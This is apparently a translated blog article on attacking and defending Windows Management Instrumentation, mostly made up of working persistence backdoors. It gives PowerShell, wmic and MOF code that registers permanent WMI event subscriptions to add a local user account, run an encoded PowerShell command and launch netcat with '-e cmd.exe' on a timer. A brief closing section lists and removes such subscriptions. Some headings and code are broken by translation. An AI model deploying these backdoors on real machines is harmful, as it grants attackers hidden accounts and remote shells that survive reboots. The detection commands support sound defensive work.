WMI Attack and Defense


WMI is a Windows management technology whose full name is Windows Management Instrumentation, or Windows Management Specification. Most Windows-based software relies on this service. So some hackers will attack WMI. This article describes WMI’s methods of attack and security defense for discussion.

Each object is a class instance that represents getting various operating system information and performing related operations, with ROOT/CIMV2 as the default namespace, CIM as the database, and WQL query statements for querying WMI object instances, classes, and namespaces.

The primary interaction of

1, Powershell (Get-WmiObject, Set-WmiInstance, Invoke-WmiMethod, etc.)

For example: Get-WmiObject-Namespace "ROOT" -Class __NAMESPACE


For example: wmic/NAMESPACE: "\root\CIMV2" PATH Win32_OperatingSystem


The event creates a query request that defines what we need to do, and we define the action once the event occurs, supporting both events.

1. Temporary event: The process to create the event is active and the temporary event is activated (run with the current permission)

For example:

# Query for new process events
$queryCreate = "SELECT * FROM __InstanceCreationEvent WITHIN 5" +"WHERE TargetInstance ISA 'Win32_Process'"

# Create an Action
$CrateAction = {
$name = $event. SourceEventArgs.NewEvent.TargetInstance.name
write-host "Process $($name) was created."

# Register WMI event
Register-WMIEvent -Query $queryCreate -Action $CrateAction

Each time a new process is opened, the process name is output:


2. Persistent events: Events are stored in the CIM database and remain active until they are removed from the database (run with system permissions and the restart remains the same)

Persistent events with backdoors

Using persistent events as a backdoor (creating requires administrator privileges) requires three parts.

1. Event filter: used to define the trigger conditions, including system startup, specific program execution, specific time intervals, etc., stored in the ROOT-subscription instance of the EventFilter object, most events use the WQL WITHIN clause to specify the polling interval.

2. Event Consumer: Used to specify specific actions to be performed, including executing commands (CommandLineEventConsumer), running scripts (ActiveScriptEventConsumer), adding log entries (NTEventLogEventConsumer), or sending mail (SMTPEventConsumer).

3, binding mechanism: binding filters to consumers (FilterToConsumerBinding class)

Backdoor instance

Whether it’s a powershell, a wmic, or a m?f file, it’s made up of three parts.

Powershell implementation

Effect: The powershell command is run every 60 seconds.

$filterName = 'Filtertest'
$consumerName = 'Consumertest'
$exePath = 'powershell -ep bypass -command “net user xxx xxx /add”'
$exePath2 = ‘powershell -ep bypass -enc dwBoAG8AYQBtAGkA’
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

Define TheFilter

$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop

Define Consumer

$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}


Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}

Wmic implementation

Effect: Triggers a bounce at a time

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE, EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE, ExecutablePath="C:\Users\admin\Desktop\nc.exe",CommandLineTemplate="C:\Users\admin\Desktop\nc.exe 443 - e c:\windows\system32\cmd.exe"

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Filtertest\"", Consumer="CommandLineEventConsumer.Name=\"Consumertest\""


Today, WMI attacks are also often exploited in many behaviors:


Mof implementation

Effect: Triggers a bounce every 30 minutes.

#pragma namespace (“\\.\root\subscription”)
instance of __EventFilter as $FILTER
Name = “FilterTEST”;
EventNamespace = “root\cimv2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Minute = 30 “;
QueryLanguage = “WQL”;
instance of ActiveScriptEventConsumer as $CONSUMER
Name = “ConsumerTEST”;
ScriptingEngine = “VBScript”;
ScriptText =
“Set objShell = CreateObject(\”WScript.Shell\”)\n”
“objShell.Run \”C:\Windows\system32\cmd.exe /C C:\nc.exe 443 -e C:\Windows\system32\cmd.exe\”\n”;
instance of __FilterToConsumerBinding
Consumer = $CONSUMER ;
Filter = $FILTER ;

To execute a command:

Mofcomp xx.mof

You can also execute the vbs script file directly:

instance ofActiveScriptEventConsumer as $Cons
Name = “ASEC”;
ScriptingEngine = “VBScript”;
ScriptFileName = “c:\asec.vbs”;

Security defense


Get-WMIObject-Namespace root\Subscription -Class __EventFilter

Get-WMIObject-Namespace root\Subscription -Class __EventConsumer

Get-WMIObject-Namespace root\Subscription -Class __FilterToConsumerBinding


Get-WMIObject-Namespace root\Subscription -Class __EventFilter -Filter”Name=’BotFilter82′” | Remove-WmiObject -Verbose

Get-WMIObject-Namespace root\Subscription -Class CommandLineEventConsumer -Filter”Name=’BotConsumer23′” | Remove-WmiObject -Verbose

Get-WMIObject-Namespace root\Subscription -Class __FilterToConsumerBinding -Filter”__Path LIKE ‘%BotFilter82%’” | Remove-WmiObject -Verbose